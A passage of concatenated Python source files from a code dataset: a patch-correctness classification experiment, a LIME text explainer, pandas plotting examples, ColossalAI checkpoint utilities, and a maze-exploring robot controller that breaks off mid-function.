{:.3f}'.format(np.array(aucs).mean(), np.array(rcs_p).mean(),\n np.array(rcs_n).mean()))\n print('---------------')\n\n def predict_leave1out_10fold(self, embedding_method, times, algorithm, ASE):\n dataset_json = pickle.load(open('data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n # ASE_features = pickle.load(open('../data/ASE_features_'+embedding_method+'.pickle', 'rb'))\n ASE_features = pickle.load(open('data/ASE_features_bert.pickle', 'rb'))\n # leave one out\n project_ids = list(dataset_json.keys())\n n = len(project_ids)\n accs, prcs, rcs, f1s, aucs = list(), list(), list(), list(), list()\n a_accs, a_prcs, a_rcs, a_f1s, a_aucs = list(), list(), list(), list(), list()\n rcs_p, rcs_n = list(), list()\n a_rcs_p, a_rcs_n = list(), list()\n random.seed(1)\n random.shuffle(project_ids,)\n n = int(math.ceil(len(project_ids) / float(times)))\n groups = [project_ids[i:i+n] for i in range(0, len(project_ids), n)]\n\n for i in range(times):\n test_group = groups[i]\n train_group = groups[:i] + groups[i+1:]\n\n test_ids = test_group\n train_ids = []\n for j in train_group:\n train_ids += j\n\n train_features, train_labels = [], []\n ASE_train_features, ASE_train_labels = [], []\n for train_id in train_ids:\n value = dataset_json[train_id]\n bugreport_vector = value[0]\n for p in range(1, len(value)):\n commit_vector, label = value[p][0], value[p][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n # features = commit_vector\n\n train_features.append(features[0])\n train_labels.append(label)\n\n if ASE:\n try:\n ASE_value = ASE_features[train_id]\n for p in range(len(ASE_value)):\n ASE_vector, ASE_label = ASE_value[p][0], ASE_value[p][1]\n\n ASE_train_features.append(np.array(ASE_vector))\n ASE_train_labels.append(ASE_label)\n except Exception as e:\n print(e)\n\n train_features = np.array(train_features)\n ASE_train_features = 
np.array(ASE_train_features)\n\n test_features, test_labels = [], []\n ASE_test_features, ASE_test_labels = [], []\n for test_id in test_ids:\n value = dataset_json[test_id]\n bugreport_vector = value[0]\n for v in range(1, len(value)):\n commit_vector, label = value[v][0], value[v][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n # features = commit_vector\n\n test_features.append(features[0])\n test_labels.append(label)\n\n if ASE:\n try:\n ASE_value = ASE_features[test_id]\n for p in range(len(ASE_value)):\n ASE_vector, ASE_label = ASE_value[p][0], ASE_value[p][1]\n\n ASE_test_features.append(np.array(ASE_vector))\n ASE_test_labels.append(ASE_label)\n except Exception as e:\n print(e)\n test_features = np.array(test_features)\n ASE_test_features = np.array(ASE_test_features)\n # dataset = np.concatenate((train_features, test_features), axis=0)\n labels = train_labels+test_labels\n # ASE_labels = ASE_train_labels+ASE_test_labels\n\n if i == 0:\n print('All data size: {}, Incorrect: {}, Correct: {}'.format(len(labels), labels.count(0),\n labels.count(1)))\n print('Algorithm: {}'.format(algorithm))\n print('#####')\n\n # 1. machine learning classifier\n cl = ML4Prediciton.Classifier(None, None, algorithm, None, train_features, train_labels, test_features, test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n\n # 2. question answer classifier\n # auc_, recall_p, recall_n, acc, prc, rc, f1 = rq_classifier(train_features, train_labels, test_features, test_labels)\n\n accs.append(acc)\n prcs.append(prc)\n rcs.append(rc)\n f1s.append(f1)\n\n aucs.append(auc_)\n rcs_p.append(recall_p)\n rcs_n.append(recall_n)\n\n if ASE:\n cl = ML4Prediciton.Classifier(None, None, algorithm, None, ASE_train_features, ASE_train_labels, ASE_test_features,\n ASE_test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n a_accs.append(acc)\n a_prcs.append(prc)\n a_rcs.append(rc)\n a_f1s.append(f1)\n\n a_aucs.append(auc_)\n a_rcs_p.append(recall_p)\n a_rcs_n.append(recall_n)\n\n print('')\n print('{} leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(accs).mean() * 100, np.array(prcs).mean() * 100, np.array(rcs).mean() * 100,\n np.array(f1s).mean() * 100, np.array(aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(np.array(aucs).mean(), np.array(rcs_p).mean(),\n np.array(rcs_n).mean()))\n print('---------------')\n\n print('')\n print('{} ASE leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(a_accs).mean() * 100, np.array(a_prcs).mean() * 100, np.array(a_rcs).mean() * 100,\n np.array(a_f1s).mean() * 100, np.array(a_aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(np.array(a_aucs).mean(), np.array(a_rcs_p).mean(),\n np.array(a_rcs_n).mean()))\n print('---------------')\n\n def predictASE(self, path_patch_sliced):\n cnt = 0\n available_patchids = []\n deduplicated_patchids = pickle.load(open('utils/deduplicated_name.pickle', 'rb'))\n with open('data/bugreport_patch.txt', 'r+') as f:\n for line in f:\n # project_id = line.split('$$')[0].strip()\n bugreport_summary = line.split('$$')[1].strip()\n # bugreport_description = line.split('$$')[2].strip()\n patch_id = line.split('$$')[3].strip()\n commit_content = line.split('$$')[4].strip()\n # label = 
int(float(line.split('$$')[5].strip()))\n # skip none and duplicated cases\n if bugreport_summary != 'None' and commit_content != 'None' and patch_id in deduplicated_patchids:\n available_patchids.append(patch_id)\n print('available patch number: {}'.format(len(available_patchids)))\n features_ASE, labels = [], []\n cnt = 0\n for root, dirs, files in os.walk(path_patch_sliced):\n for file in files:\n if file.endswith('$cross.json'):\n cnt += 1\n # # file: patch1-Closure-9-Developer-1.patch\n # name_part = file.split('.')[0]\n # name = '-'.join(name_part.split('-')[:-1])\n # label = 1 if root.split('/')[-4] == 'Correct' else 0\n # project = name.split('-')[1]\n # id = name.split('-')[2]\n # project_id = project + '-' + id\n # feature_json = root + '_cross.json'\n\n # file: patch1$.json\n name = file.split('$cross')[0]\n id = root.split('/')[-1]\n project = root.split('/')[-2]\n label = 1 if root.split('/')[-3] == 'Correct' else 0\n tool = root.split('/')[-4]\n patch_id_test = '-'.join([name, project, id, tool])\n patch_id_tmp = '-'.join([name+'_1', project, id, tool])\n # only consider the patches that have associated bug report\n if patch_id_test not in available_patchids and patch_id_tmp not in available_patchids:\n # print('name: {}'.format(patch_id_test))\n continue\n feature_json = os.path.join(root, file)\n try:\n with open(feature_json, 'r+') as f:\n vector_str = json.load(f)\n vector_ML = np.array(list(map(float, vector_str)))\n except Exception as e:\n print(e)\n continue\n features_ASE.append(vector_ML)\n labels.append(label)\n # print('collecting {}'.format(project_id))\n # print('cnt js: {}'.format(cnt))\n features_ASE = np.array(features_ASE)\n labels = np.array(labels)\n cl = ML4Prediciton.Classifier(features_ASE, labels, 'lr', 10)\n cl.cross_validation()\n\n def statistics(self, embedding_method,):\n dataset_json = pickle.load(open('../data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n project_ids = list(dataset_json.keys())\n\n plt_data = []\n index = []\n for project_id in project_ids:\n value = dataset_json[project_id]\n correct, incorrect = 0, 0\n for p in range(1, len(value)):\n _, label = value[p][0], value[p][1]\n if label == 1:\n correct +=1\n elif label == 0:\n incorrect += 1\n index.append(project_id)\n plt_data.append([correct, incorrect])\n\n print(len(index))\n img_df = pd.DataFrame(np.array(plt_data), index, columns=['correct', 'incorrect'])\n img_df.plot(kind='bar', rot=0)\n plt.show()\n\nif __name__ == '__main__':\n embedding = 'bert'\n e = Experiment()\n\n # e.predict_10fold(embedding)\n # e.statistics(embedding+'(description)')\n\n # e.predict_10fold(embedding+'(description)', algorithm='lr')\n # e.predict_leave1out(embedding+'(description)', times=30, algorithm='lr')\n e.predict_leave1out_10fold(embedding+'(description)', times=10, algorithm='lr', ASE=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":17989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268962334","text":"import json\nimport torch\nfrom transformers import AutoTokenizer, AutoModel, AutoModelForSequenceClassification\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom lime.lime_text import LimeTextExplainer\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\nmodel_path = \"models/scibert_best/network-snapshot-latest\"\nmodel = 
AutoModelForSequenceClassification.from_pretrained(model_path)\nmodel.eval()\nmodel.to(device)\n\nmodel_name = 'allenai/scibert_scivocab_uncased'\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n# with open(\"data/test/stylegan.json\", \"r\") as f:\n# data = json.load(f)\n# sections = list(map(lambda x: x[\"text\"], data[\"sections\"]))\n\n# print(len(sections))\n\nclass_names = ['positive','negative', 'neutral']\n\ndef predictor(texts):\n print(len(texts))\n outputs = model(**tokenizer(texts, return_tensors=\"pt\", padding=True))\n probas = F.softmax(outputs.logits).detach().numpy()\n return probas\n\nexplainer = LimeTextExplainer(class_names=class_names)\n\nstr_to_predict = \"Our goal is to predict whether a paper is going to be rejected or accepted at a conference, just from the contentsof that paper. For this task, we utilized thePeerReaddataset [1], which contains about 14k reviews, papersand their acceptance decision of up until 2017. We use two different approaches to embed text into a vectorspace: a Bag of Words embedding and pre-trained BERT model [2]. Both approaches have a feed-forwardneural network on top to determine the final acceptance prediction. For the majority of the implementation1of our networks, we used the packages Pytorch [3], Pytorch Lightning [4], Huggingface Transformers [5] andSentence-Transformers [6]. For simplified logging and visualization we used the package Weights & Biases [7].\"\nexp = explainer.explain_instance(str_to_predict, predictor, num_features=20, num_samples=100)\n# exp.show_in_notebook(text=str_to_predict)\nexp.save_to_file('lime.html')\n\n# tokenized_sections = tokenizer(sections, truncation=True, padding=\"max_length\", max_length=512)\n\n# with torch.no_grad():\n# input = {key: torch.tensor(val).to(device) for key, val in tokenized_sections.items()}\n# output = model(**input)\n# print(output)\n# prediction = output.logits.mean(axis=0)\n# print(prediction)\n# prob = torch.nn.functional.softmax(prediction, dim=0)\n# print(prob)","sub_path":"lime_explainer.py","file_name":"lime_explainer.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541325257","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf=pd.DataFrame(np.random.randn(10,4),index=pd.date_range('1/1/2000',periods=10), columns=list('ABCD'))\nprint(df.describe())\ndf.plot()\nplt.savefig(\"plot.png\", dpi=300)#jpg,png,svg\nplt.show()\n\n\n\ndf=pd.DataFrame(np.random.rand(10,4),columns=['a','b','c','d'])\nprint(df.describe())\ndf.plot.bar()\nplt.savefig(\"plotbar.png\", dpi=300)#jpg,png,svg\ndf.plot.bar(stacked=True)\nplt.savefig(\"plotbarstacked.png\", dpi=300)#jpg,png,svg\ndf.plot.barh()\nplt.savefig(\"plotbarh.png\", dpi=300)#jpg,png,svg\ndf.plot.barh(stacked=True)\nplt.savefig(\"plotbarhstacked.png\", dpi=300)#jpg,png,svg\nplt.show()\n\n\ndf=pd.DataFrame({'a':np.random.randn(1000)+1,'b':np.random.randn(1000),'c':\nnp.random.randn(1000) - 1}, columns=['a', 'b', 'c'])\ndf.plot.hist(bins=20)\nplt.savefig(\"plothist.png\", dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(np.random.rand(10, 5), columns=['A', 'B', 'C', 'D', 'E'])\ndf.plot.box()\nplt.savefig(\"plotbox.png\", dpi=300)#jpg,png,svg\ndf.plot.area()\nplt.savefig(\"plotarea.png\", dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(np.random.rand(50, 4), columns=['a', 'b', 'c', 'd'])\ndf.plot.scatter(x='a', y='b')\nplt.savefig(\"plotscatter.png\", 
dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(3 * np.random.rand(4), index=['a', 'b', 'c', 'd'], columns=['x'])\ndf.plot.pie(subplots=True)\nplt.savefig(\"plotpie.png\", dpi=300)#jpg,png,svg\nplt.show()","sub_path":"my_pandas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259819509","text":"import os\nimport os.path as osp\nimport re\nfrom typing import Tuple\n\nimport torch\n\nfrom .context import Config\nfrom .context.parallel_mode import ParallelMode\nfrom .core import global_context as gpc\n\n__all__ = [\n 'get_checkpoint_path',\n 'get_latest_checkpoint_path',\n 'get_latest_checkpoint_pattern',\n 'save_checkpoint',\n 'load_checkpoint'\n]\n\n\ndef unwrap_config(config: Config):\n '''\n unwrap Config objects to normal dicts\n '''\n config_dict = dict()\n for k, v in config.items():\n if isinstance(v, dict):\n config_dict[k] = unwrap_config(v)\n else:\n config_dict[k] = v\n\n return config_dict\n\n\ndef _get_ranks_name():\n # tensor parallel\n tp_local_rank = 0\n if gpc.is_initialized(ParallelMode.TENSOR):\n tp_local_rank = gpc.get_local_rank(ParallelMode.TENSOR)\n\n # pipeline parallel\n pp_local_rank = 0\n if gpc.is_initialized(ParallelMode.PIPELINE):\n pp_local_rank = gpc.get_local_rank(ParallelMode.PIPELINE)\n\n ranks_name = f'tp{tp_local_rank}-pp{pp_local_rank}'\n return ranks_name\n\n\ndef _get_standard_checkpoint_filename(epoch: int, suffix: str = ''):\n ranks_name = _get_ranks_name()\n return f'epoch{epoch}-{ranks_name}{suffix}.pt'\n\n\ndef get_checkpoint_path(checkpoint_dir: str, epoch: int, suffix: str = ''):\n '''This is a function to generate the checkpoint path from the (checkpoint_dir, epoch, suffix, gpu_parallel_rank) tuple.\n This is useful during generation and recuperation of the checkpoint.\n\n :param checkpoint_dir: set up a directory for saving checkpoints\n :type checkpoint_dir: str\n :param epoch: epoch number (indicate how many epochs have you trained this model)\n :type epoch: int\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :return: checkpoint path to be generated \n :rtype: path\n '''\n ckpt_filename = _get_standard_checkpoint_filename(epoch, suffix)\n return os.path.join(checkpoint_dir, ckpt_filename)\n\n\ndef _ensure_directory_exists(filename: str):\n # ensure the directory exists\n dir = os.path.dirname(filename)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n\ndef get_latest_checkpoint_pattern(suffix: str = ''):\n '''Generate Regular expression of latest checkpoint's pattern\n\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :return: checkpoint pattern\n :rtype: regular expression\n '''\n ranks_name = _get_ranks_name()\n ckpt_pattern = re.compile(f'epoch(\\d+)-{ranks_name}{suffix}\\.pt')\n return ckpt_pattern\n\n\ndef get_latest_checkpoint_path(checkpoint_dir: str, suffix: str = ''):\n '''This is a function to retrieve the latest checkpoint path from the (checkpoint_dir, suffix, gpu_parallel_rank) tuple.\n This is useful during recuperation of the checkpoint, especially when you do not know the epoch number.\n\n :param checkpoint_dir: directory for saving checkpoints\n :type checkpoint_dir: str\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :raises FileNotFoundError: raise error when we cannot find the 
latest checkpoint file with inputs given\n :return: the latest checkpoint path to be retrieved \n :rtype: path\n '''\n CKPT_NAME_PAT = get_latest_checkpoint_pattern(suffix=suffix)\n\n last_epoch = -1\n assert osp.isdir(checkpoint_dir), f'{checkpoint_dir} is not a directory'\n\n for filename in os.listdir(checkpoint_dir):\n ret = CKPT_NAME_PAT.match(filename)\n if ret:\n epoch = int(ret[0].split('-')[0].lstrip('epoch'))\n if epoch > last_epoch:\n last_epoch = epoch\n\n if last_epoch == -1:\n ranks_name = _get_ranks_name()\n raise FileNotFoundError(f\"Cannot find the latest checkpoint file for {ranks_name} in {checkpoint_dir}\")\n else:\n target_file = _get_standard_checkpoint_filename(last_epoch, suffix=suffix)\n path = osp.join(checkpoint_dir, target_file)\n return path\n\n\ndef save_checkpoint(checkpoint_path: str,\n epoch: int,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n lr_scheduler: torch.optim.lr_scheduler._LRScheduler = None,\n **kwargs):\n '''Given a directory to store the checkpoints, saves all the training components' parameters or buffers, such as model, optimizer, lr_scheduler and etc. into a checkpoint dictionary. \n \n This method can be used for both colosalai nn.BaseModel and normal pytorch nn.Module.\n\n\n :param checkpoint_path: set up a directory for saving checkpoints\n :type checkpoint_path: str\n :param epoch: epoch number (indicate how many epochs have you trained this model)\n :type epoch: int\n :param model: model to be registered\n :type model: torch.nn.Module\n :param optimizer: optimizer to be registered\n :type optimizer: torch.optim.Optimizer\n :param lr_scheduler: lr_scheduler to be registered, defaults to None\n :type lr_scheduler: torch.optim.lr_scheduler._LRScheduler, optional\n '''\n # for compatibility with normal pytorch nn.Module\n if hasattr(model, 'state_dict_for_save_checkpoint'):\n model_sd = model.state_dict_for_save_checkpoint()\n else:\n model_sd = model.state_dict()\n\n # ckpt container\n checkpoint = {\n 'epoch': epoch,\n 'model': model_sd,\n 'optimizer': optimizer.state_dict(),\n **kwargs\n }\n if lr_scheduler is not None:\n checkpoint['lr_scheduler'] = lr_scheduler.state_dict()\n\n _ensure_directory_exists(checkpoint_path)\n torch.save(checkpoint, checkpoint_path)\n\n\ndef load_checkpoint(checkpoint_path: str,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n lr_scheduler: torch.optim.lr_scheduler._LRScheduler = None,\n finetune: bool = False,\n strict: bool = True) -> Tuple:\n '''Loads the checkpoint file. \n If finetune is False, then we intend to continue/resume the training process from the checkpoint given. \n So we copy parameters and buffers from state_dict into these modules(model, optimizer,lr_scheduler) and its descendants. 
\n If finetune is True, then only the weights and buffers of model should be reload.\n If strict is True, then the keys of state_dict must exactly match the keys returned by this module’s state_dict() function.\n \n :param checkpoint_path: the exact and matched checkpoint_path directory to retrieve appropriate state_dict\n :type checkpoint_path: str\n :param model: model to reload parameters and buffers\n :type model: torch.nn.Module\n :param optimizer: optimizer to recuperate\n :type optimizer: torch.optim.Optimizer \n :param lr_scheduler: lr_scheduler to recuperate, defaults to None\n :type lr_scheduler: torch.optim.lr_scheduler._LRScheduler, optional\n :param finetune: whether to finetune the model with new dataset or continue the pre-training, defaults to False\n :type finetune: bool, optional\n :param strict: whether to strictly enforce that the keys in\n :attr:`state_dict` of the checkpoint match the names of\n parameters and buffers in model., defaults to True\n :type strict: bool, optional\n :raises ValueError: raise error if the model/optimizer cannot successfully be recuperated\n :return: (the epoch number of the checkpoint retrieved, the checkpoint retrieved)\n :rtype: Tuple\n\n '''\n # Load the checkpoint.\n checkpoint = torch.load(checkpoint_path, map_location='cpu')\n try:\n last_epoch = checkpoint.pop('epoch') if not finetune else 0\n model.load_state_dict(checkpoint.pop('model'), strict=strict)\n except KeyError:\n raise ValueError('Checkpoint is corrupted')\n\n if not finetune:\n try:\n optimizer.load_state_dict(checkpoint.pop('optimizer'))\n except KeyError:\n raise ValueError('Checkpoint is corrupted')\n\n if lr_scheduler is not None and 'lr_scheduler' in checkpoint:\n lr_scheduler.load_state_dict(checkpoint.pop('lr_scheduler'))\n\n return last_epoch, checkpoint\n","sub_path":"colossalai/checkpointing.py","file_name":"checkpointing.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343320658","text":"import re\nfrom utils import *\nfrom time import time, sleep\n\n\nclass Robot:\n def __init__(self, exploration_status, facing, discovered_map):\n self.exploration_status = exploration_status\n self.center = 17\n self.facing = facing\n self.discovered_map = discovered_map\n self._probability_map = [[[0.0, 0.0] for _ in range(15)] for _ in range(20)]\n self._arrow_map = [[[0, 0, 0, 0] for _ in range(15)] for _ in range(20)]\n self._sensors = [\n {\"mount_loc\": SWS, \"facing\": WEST, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NWS, \"facing\": WEST, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NWS, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NS, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NES, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NS, \"facing\": EAST, \"range\": 5, \"blind_spot\": 0}\n ]\n\n self.num_sensor_readings = 11\n regex_str = '^(\\d,){%s}$' % (len(self._sensors) * self.num_sensor_readings)\n self._readings_regex = re.compile(regex_str)\n\n def _mark_probability(self, cell, count, total):\n y, x = get_coordinates(cell)\n print(y, x, count, total)\n\n if self._probability_map[y][x][0] == 1.0 and self._probability_map[y][x][1] == 0.0:\n print('perm')\n return\n\n self._probability_map[y][x][0] += count\n self._probability_map[y][x][1] += total\n\n prob_obstacle = self._probability_map[y][x][0]\n prob_total = self._probability_map[y][x][1]\n\n print(y, x, prob_obstacle, 
prob_total)\n\n if not self.exploration_status[y][x]:\n self.exploration_status[y][x] = 1\n\n if prob_obstacle / prob_total > 0.5:\n self.discovered_map[y][x] = 1\n return 1\n else:\n self.discovered_map[y][x] = 0\n return 0\n\n def _mark_permanent(self, cell):\n y, x = get_coordinates(cell)\n\n self._probability_map[y][x][0] = 1.0\n self._probability_map[y][x][1] = 0.0\n\n if not self.exploration_status[y][x]:\n self.exploration_status[y][x] = 1\n\n self.discovered_map[y][x] = 0\n\n return True\n\n def _mark_arrow_taken(self, y, x, facing):\n opposite = (facing + 2) % 4\n\n self._arrow_map[y][x][facing] = 1\n self._arrow_map[y][x][opposite] = 1\n\n return True\n\n def in_efficiency_limit(self):\n if (self.center in range(257, 270) and self.facing == EAST) \\\n or (self.center in range(28, 284, 15) and self.facing == SOUTH) \\\n or (self.center in range(32, 45) and self.facing == WEST) \\\n or (self.center in range(18, 274, 15) and self.facing == NORTH):\n return True\n\n return False\n\n def mark_robot_standing(self):\n robot_cells = get_robot_cells(self.center)\n updated_cells = {}\n mark_permanent = self._mark_permanent\n for cell in robot_cells:\n if mark_permanent(cell):\n updated_cells[cell] = 0\n\n return updated_cells\n\n def get_completion_percentage(self):\n count = 0.0\n for row in self.exploration_status:\n for i in row:\n count += i\n\n return count / 3.0\n\n def is_complete(self, explore_limit, start_time, time_limit):\n completion = self.get_completion_percentage\n return completion() >= explore_limit \\\n or float(time() - start_time >= time_limit)\n\n def turn_robot(self, sender, direction):\n if direction == FORWARD:\n return\n\n if direction == BACKWARD:\n sender.send_arduino(get_arduino_cmd(LEFT))\n self.facing = (self.facing + LEFT) % 4\n direction = LEFT\n sender.wait_arduino('D')\n\n sender.send_arduino(get_arduino_cmd(direction))\n self.facing = (self.facing + direction) % 4\n\n sender.wait_arduino('D')\n\n if ARROW_SCAN:\n self.check_arrow(sender)\n\n def move_robot(self, sender, direction):\n self.turn_robot(sender, direction)\n\n sender.send_arduino(get_arduino_cmd(FORWARD))\n\n if self.facing == NORTH:\n self.center += 15\n elif self.facing == EAST:\n self.center += 1\n elif self.facing == SOUTH:\n self.center -= 15\n elif self.facing == WEST:\n self.center -= 1\n\n updated_cells = self.mark_robot_standing()\n\n sender.wait_arduino('D')\n\n if ARROW_SCAN:\n self.check_arrow(sender)\n\n return updated_cells\n\n def check_free(self, direction):\n true_bearing = (self.facing + direction) % 4\n\n robot_cells = get_robot_cells(self.center)\n\n try:\n if true_bearing == NORTH:\n y, x = get_coordinates(robot_cells[0])\n y += 1\n if y < 0 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y][x + 1] == 1\n or self.discovered_map[y][x + 2] == 1)\n elif true_bearing == EAST:\n y, x = get_coordinates(robot_cells[2])\n x += 1\n if y < 2 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y - 1][x] == 1\n or self.discovered_map[y - 2][x] == 1)\n elif true_bearing == SOUTH:\n y, x = get_coordinates(robot_cells[6])\n y -= 1\n if y < 0 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y][x + 1] == 1\n or self.discovered_map[y][x + 2] == 1)\n elif true_bearing == WEST:\n y, x = get_coordinates(robot_cells[0])\n x -= 1\n if y < 2 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y - 1][x] == 1\n or 
self.discovered_map[y - 2][x] == 1)\n except IndexError:\n return False\n\n def is_arrow_possible(self):\n arrow_range = 1\n y, x = get_coordinates(self.center)\n discovered_map = self.discovered_map\n arrow_map = self._arrow_map\n facing = self.facing\n\n try:\n for distance in range(2, arrow_range + 2):\n if facing == NORTH:\n new_x = x - distance\n if new_x < 0:\n raise IndexError\n print('checking %s,%s %s,%s %s,%s' % (y, new_x, y + 1, new_x, y - 1, new_x))\n obstacles = [discovered_map[y][new_x] == 1, discovered_map[y + 1][new_x] == 1,\n discovered_map[y - 1][new_x] == 1]\n marked = [arrow_map[y][new_x][facing], arrow_map[y + 1][new_x][facing],\n arrow_map[y][new_x][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(y, new_x, facing)\n self._mark_arrow_taken(y + 1, new_x, facing)\n self._mark_arrow_taken(y - 1, new_x, facing)\n return True\n elif facing == EAST:\n new_y = y + distance\n print('checking %s,%s %s,%s %s,%s' % (new_y, x, new_y, x + 1, new_y, x - 1))\n obstacles = [discovered_map[new_y][x] == 1, discovered_map[new_y][x + 1] == 1,\n discovered_map[new_y][x - 1] == 1]\n marked = [arrow_map[new_y][x][facing], arrow_map[new_y][x + 1][facing],\n arrow_map[new_y][x - 1][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(new_y, x, facing)\n self._mark_arrow_taken(new_y, x + 1, facing)\n self._mark_arrow_taken(new_y, x - 1, facing)\n return True\n elif facing == SOUTH:\n new_x = x + distance\n print('checking %s,%s %s,%s %s,%s' % (y, new_x, y + 1, new_x, y - 1, new_x))\n obstacles = [discovered_map[y][new_x] == 1, discovered_map[y + 1][new_x] == 1,\n discovered_map[y - 1][new_x] == 1]\n marked = [arrow_map[y][new_x][facing], arrow_map[y + 1][new_x][facing],\n arrow_map[y][new_x][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(y, new_x, facing)\n self._mark_arrow_taken(y + 1, new_x, facing)\n self._mark_arrow_taken(y - 1, new_x, facing)\n return True\n elif facing == WEST:\n new_y = y - distance\n if new_y < 0:\n raise IndexError\n print('checking %s,%s %s,%s %s,%s' % (new_y, x, new_y, x + 1, new_y, x - 1))\n obstacles = [discovered_map[new_y][x] == 1, discovered_map[new_y][x + 1] == 1,\n discovered_map[new_y][x - 1] == 1]\n marked = [arrow_map[new_y][x][facing], arrow_map[new_y][x + 1][facing],\n arrow_map[new_y][x - 1][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(new_y, x, facing)\n self._mark_arrow_taken(new_y, x + 1, facing)\n self._mark_arrow_taken(new_y, x - 1, facing)\n return True\n return False\n except IndexError:\n return False\n\n def check_arrow(self, sender):\n if self.is_arrow_possible():\n y, x = get_coordinates(self.center)\n msg = '%s,%s,%s' % (x, y, self.facing)\n enable_print()\n sender.send_rpi(msg)\n sender.wait_rpi('Y')\n disable_print()\n\n else:\n print(get_coordinates(self.center), 'false')\n\n def get_sensor_readings(self, sender):\n mark_probability = self._mark_probability\n\n sender.send_arduino('g')\n readings = sender.wait_arduino(self._readings_regex, sensor_reading=True)\n print('Readings: %s' % readings)\n readings = readings.split(',')\n\n readings = [int(x) for x in readings]\n\n readings = [readings[i:i + len(self._sensors)] for i in range(0, len(readings), len(self._sensors))]\n\n readings = [[row[i] for row in readings] for i, _ in enumerate(readings[0])]\n print(readings)\n robot_cells = get_robot_cells(self.center)\n sensors = self._sensors[:]\n sensor_index = sensors.index\n updated_cells = {}\n\n for sensor in sensors:\n true_facing = 
(sensor[\"facing\"] + self.facing) % 4\n\n offset = self.facing * 2\n true_mounting = (sensor[\"mount_loc\"] + offset) % 8\n if true_mounting == NWS:\n origin = robot_cells[0]\n elif true_mounting == NS:\n origin = robot_cells[1]\n elif true_mounting == NES:\n origin = robot_cells[2]\n elif true_mounting == WS:\n origin = robot_cells[3]\n elif true_mounting == ES:\n origin = robot_cells[5]\n elif true_mounting == SWS:\n origin = robot_cells[6]\n elif true_mounting == SS:\n origin = robot_cells[7]\n elif true_mounting == SES:\n origin = robot_cells[8]\n elif true_mounting == CS:\n origin = robot_cells[4]\n\n y, x = get_coordinates(origin)\n read_range = list(range(sensor[\"blind_spot\"] + 1, sensor[\"range\"] + 1))\n\n reading = readings[sensor_index(sensor)]\n print('Sensor', sensor_index(sensor))\n\n weight = 4\n for cell in read_range:\n try:\n if true_facing == NORTH:\n to_explore = (y + cell, x)\n elif true_facing == EAST:\n to_explore = (y, x + cell)\n elif true_facing == SOUTH:\n to_explore = (y - cell, x)\n elif true_facing == WEST:\n to_explore = (y, x - cell)\n\n if to_explore[0] < 0 or to_explore[1] < 0:\n print('ie')\n raise IndexError\n\n cell_index = get_grid_index(to_explore[0], to_explore[1])\n\n if mark_probability(cell_index, weight * reading.count(cell), weight * self.num_sensor_readings):\n raise IndexError\n\n weight /= 2\n\n except IndexError:\n break\n print('br')\n\n return updated_cells\n\n def get_explore_string(self):\n exploration_status = self.exploration_status[:]\n\n explore_str = ''.join(str(grid) for row in exploration_status for grid in row)\n\n explore_status_string = '11%s11' % explore_str\n explore_status_string = str(hex(int(explore_status_string, 2)))\n\n file = open(\"explore_string.txt\", \"w+\")\n file.write(explore_status_string[2:])\n file.close()\n\n return explore_status_string[2:]\n\n def get_map_string(self):\n discovered_map = self.discovered_map[:]\n\n map_str = ''.join(str(grid) for row in discovered_map for grid in row if grid != 2)\n\n pad_length = (8 - 